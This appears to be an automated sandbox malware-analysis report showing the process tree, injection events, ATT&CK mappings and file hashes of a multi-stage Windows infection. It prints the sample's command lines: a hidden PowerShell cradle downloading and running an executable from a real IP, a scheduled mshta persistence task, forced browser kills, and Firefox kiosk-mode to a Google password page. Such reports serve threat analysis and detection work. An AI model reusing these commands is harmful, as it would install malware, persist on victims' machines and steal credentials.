pid Process 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 4432 125bc79e7a.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3820 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4580 wrote to memory of 4208 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 4580 wrote to memory of 4208 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 4580 wrote to memory of 4208 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 4580 wrote to memory of 2772 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4580 wrote to memory of 2772 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4580 wrote to memory of 2772 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4208 wrote to memory of 2308 4208 cmd.exe 88 PID 4208 wrote to memory of 2308 4208 cmd.exe 88 PID 4208 wrote to memory of 2308 4208 cmd.exe 88 PID 2772 wrote to memory of 1828 2772 mshta.exe 91 PID 2772 wrote to memory of 1828 2772 mshta.exe 91 PID 2772 wrote to memory of 1828 2772 mshta.exe 91 PID 1828 wrote to memory of 1144 1828 powershell.exe 101 PID 1828 wrote to memory of 1144 1828 powershell.exe 101 PID 1828 wrote to memory of 1144 1828 powershell.exe 101 PID 1144 wrote to memory of 1728 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 102 PID 1144 wrote to memory of 1728 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 102 PID 1144 wrote to memory of 1728 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 102 PID 1728 wrote to memory of 5892 1728 rapes.exe 104 PID 1728 wrote to memory of 5892 1728 rapes.exe 104 PID 5892 wrote to memory of 5356 5892 v1BRaoR.exe 105 PID 5892 wrote to memory of 5356 5892 v1BRaoR.exe 105 PID 5892 wrote to memory of 5356 5892 v1BRaoR.exe 105 PID 5892 wrote to memory of 1940 5892 v1BRaoR.exe 106 PID 5892 wrote to memory of 1940 5892 v1BRaoR.exe 106 PID 5892 wrote to memory of 1940 5892 v1BRaoR.exe 106 PID 5892 wrote to memory of 1580 5892 v1BRaoR.exe 107 PID 5892 wrote to memory of 1580 5892 v1BRaoR.exe 107 PID 5892 wrote to memory of 1580 5892 v1BRaoR.exe 107 PID 5892 wrote to memory of 1868 5892 v1BRaoR.exe 108 PID 5892 wrote to memory of 1868 5892 v1BRaoR.exe 108 PID 5892 wrote to memory of 1868 5892 v1BRaoR.exe 108 PID 5892 wrote to memory of 4900 5892 v1BRaoR.exe 109 PID 5892 wrote to memory of 4900 5892 v1BRaoR.exe 109 PID 5892 wrote to memory of 4900 5892 v1BRaoR.exe 109 PID 5892 wrote to memory of 2872 5892 v1BRaoR.exe 110 PID 5892 wrote to memory of 2872 5892 v1BRaoR.exe 110 PID 5892 wrote to memory of 2872 5892 v1BRaoR.exe 110 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 5892 wrote to memory of 1408 5892 v1BRaoR.exe 111 PID 1728 wrote to memory of 4336 1728 rapes.exe 120 PID 1728 wrote to memory of 4336 1728 rapes.exe 120 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 4336 wrote to memory of 5684 4336 Nehh6wZ.exe 121 PID 1728 wrote to memory of 3872 1728 rapes.exe 122 PID 1728 wrote to memory of 3872 1728 rapes.exe 122 PID 3872 wrote to memory of 2944 3872 31W3sid.exe 123 PID 3872 wrote to memory of 2944 3872 31W3sid.exe 123 PID 3872 wrote to memory of 2944 3872 31W3sid.exe 123 PID 3872 wrote to memory of 2944 3872 31W3sid.exe 123 PID 3872 wrote to memory of 2944 3872 31W3sid.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Ka56omamK5q /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ukiZ5DDn.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Ka56omamK5q /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ukiZ5DDn.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2308
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\6ukiZ5DDn.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE"C:\Users\Admin\AppData\Local\TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5356
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1580
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4900
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2872
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 13928⤵
- Program crash
PID:1392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5684
-
-
-
C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks SCSI registry key(s)
PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4160 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494930101\eb861fdb64.exe"C:\Users\Admin\AppData\Local\Temp\10494930101\eb861fdb64.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10494930101\eb861fdb64.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2280
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494940101\a6388500fc.exe"C:\Users\Admin\AppData\Local\Temp\10494940101\a6388500fc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2636 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10494940101\a6388500fc.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3632
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494951101\3df029ef04.exe"C:\Users\Admin\AppData\Local\Temp\10494951101\3df029ef04.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5280 -
C:\Users\Admin\AppData\Local\Temp\is-9DNIG.tmp\3df029ef04.tmp"C:\Users\Admin\AppData\Local\Temp\is-9DNIG.tmp\3df029ef04.tmp" /SL5="$B017E,28467627,844800,C:\Users\Admin\AppData\Local\Temp\10494951101\3df029ef04.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2452 -
C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3384 -
C:\Users\Admin\AppData\Local\Temp\is-A0MC0.tmp\KMSpico.tmp"C:\Users\Admin\AppData\Local\Temp\is-A0MC0.tmp\KMSpico.tmp" /SL5="$1101DC,2952592,69120,C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2944
-
-
-
C:\Users\Admin\AppData\Roaming\MyApp\core.exe"C:\Users\Admin\AppData\Roaming\MyApp\core.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4892
-
-
C:\Users\Admin\AppData\Roaming\MyApp\info.exe"C:\Users\Admin\AppData\Roaming\MyApp\info.exe"8⤵
- Executes dropped EXE
PID:4400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494960101\1b650c32bf.exe"C:\Users\Admin\AppData\Local\Temp\10494960101\1b650c32bf.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2672
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2932
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 13128⤵
- Program crash
PID:3476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494970101\bf5d673470.exe"C:\Users\Admin\AppData\Local\Temp\10494970101\bf5d673470.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\10494980101\7baea9db48.exe"C:\Users\Admin\AppData\Local\Temp\10494980101\7baea9db48.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:5552
-
-
C:\Users\Admin\AppData\Local\Temp\10494990101\125bc79e7a.exe"C:\Users\Admin\AppData\Local\Temp\10494990101\125bc79e7a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4432 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:1620
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3820 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {3466d9ca-c84a-450a-ba02-4a9298cafc10} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:1276
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2488 -prefsLen 27135 -prefMapHandle 2492 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {d910be2d-39a7-4489-9823-79177c30b60f} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:1536
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3856 -prefsLen 25164 -prefMapHandle 3860 -prefMapSize 270279 -jsInitHandle 3864 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3872 -initialChannelId {5d673c60-7d62-4420-84d4-7d4a2ca29d6a} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:4068
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4048 -prefsLen 27276 -prefMapHandle 4052 -prefMapSize 270279 -ipcHandle 4072 -initialChannelId {3baf0b5b-bbff-4cc5-a013-f5a937c6a7c0} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:5248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4652 -prefsLen 34775 -prefMapHandle 3244 -prefMapSize 270279 -jsInitHandle 3248 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4660 -initialChannelId {cbcdf841-27be-478f-828c-80f0d3b0be92} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:2016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2928 -prefsLen 35012 -prefMapHandle 2932 -prefMapSize 270279 -ipcHandle 5112 -initialChannelId {db71b6e3-1127-434f-afeb-c1bc08f1d801} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:6080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5448 -prefsLen 32952 -prefMapHandle 5452 -prefMapSize 270279 -jsInitHandle 5456 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4972 -initialChannelId {f3dd206f-acc2-4c8f-ab3a-e535757b3d6c} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:3964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5592 -prefsLen 32952 -prefMapHandle 5596 -prefMapSize 270279 -jsInitHandle 5600 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5608 -initialChannelId {8e197ad1-a607-43ad-8726-0040f6d9f441} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:5752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5796 -prefsLen 32952 -prefMapHandle 5800 -prefMapSize 270279 -jsInitHandle 5804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5812 -initialChannelId {59698ce1-35a1-4551-b3cb-b2e9ef4e09d3} -parentPid 3820 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3820" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:3856
-
-
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10495000271\5809bfa64e.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\10495010101\8ef90e3801.exe"C:\Users\Admin\AppData\Local\Temp\10495010101\8ef90e3801.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\10495020101\4b7069bb00.exe"C:\Users\Admin\AppData\Local\Temp\10495020101\4b7069bb00.exe"6⤵
- Executes dropped EXE
PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\10495030101\31W3sid.exe"C:\Users\Admin\AppData\Local\Temp\10495030101\31W3sid.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4020 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5732
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks SCSI registry key(s)
PID:1120
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1408 -ip 14081⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5280
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4992 -ip 49921⤵PID:5256
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD535e32189804841a8c041cb58338fdb5e
SHA132818baeded90d4e9a40d7ca0f36ac15435af398
SHA25673abbc6945419c189d611ac0a35e50aad935841dc1d4f1f2f787c2a475a997dd
SHA512f1e2f7722ced49001b5124b296987d57330820d92247b9616d5dd66c4c60f42907da998cdd2c5ed26b8219ab2be8bc827d21815c290b86f96836f04fac2df115
-
Filesize
3.0MB
MD5866664b3ce72c7dad2ffc552282ddd7c
SHA143404be154db8ee32dc7c59de01f015235e44de2
SHA256630af8886f6e7b8cb7b530ed641a4ddf20eec3bedd2a5aa60285b5a5805a603a
SHA512a0b5eb5438cedaa60b6f23ea9daaa3e71cddfca906f933f3a3a44d04cb63427a1fb6ea4153bf4027d767ef5620ab0e6712257f3ea5e508d74662f1596dfcc712
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
3.1MB
MD50bc69609d28f954c1349365683ce5230
SHA16fb6d7ec9d7b32a8f63059357655206042362dbc
SHA2569a1ec9edad991c2bd77e8cbedce6047caa84cde2e11ca30959ba4b3d7c6b7895
SHA5129ec59259560f5fddde939e82aad2c588535edeba2d71af83cfa12dbc58d332c2b3c78d3009f119350067854185899357cd641047133a19c258b810711fd85b92
-
Filesize
3.5MB
MD5d546ca721b7eb5805324a652167e9d06
SHA1078ef0b03d72ad77b6c0aef6d5643548bd4014cd
SHA256b744ab8e1f5b87327281e9c6559c8f8d460439c054dd3783ed395137fcae8064
SHA51279290e1ad225916c8ff473c7866770a01c42d9d5a77687314153548ca049dfc0521c29111c3f3239ef4ada7f127826a6dbf3ebc472e83a422901cec04230ef23
-
Filesize
674KB
MD532449d0a9a4698567ce8f4900e2cb370
SHA155817857ea2a8c6781eefd542f8f65bae756314a
SHA25616beaf84a5f731c5c450a8535b9d53e1aa7184e230883bd57b351bf4561bec72
SHA512b81c603d2e795093764ab807793f0403ff94feaa2155d68a9c75cc1eceb9360a4c54aedfd90a857f7e0333a3dbae6a0d3bbb9a40e017697b9d3511637f2bc74f
-
Filesize
351KB
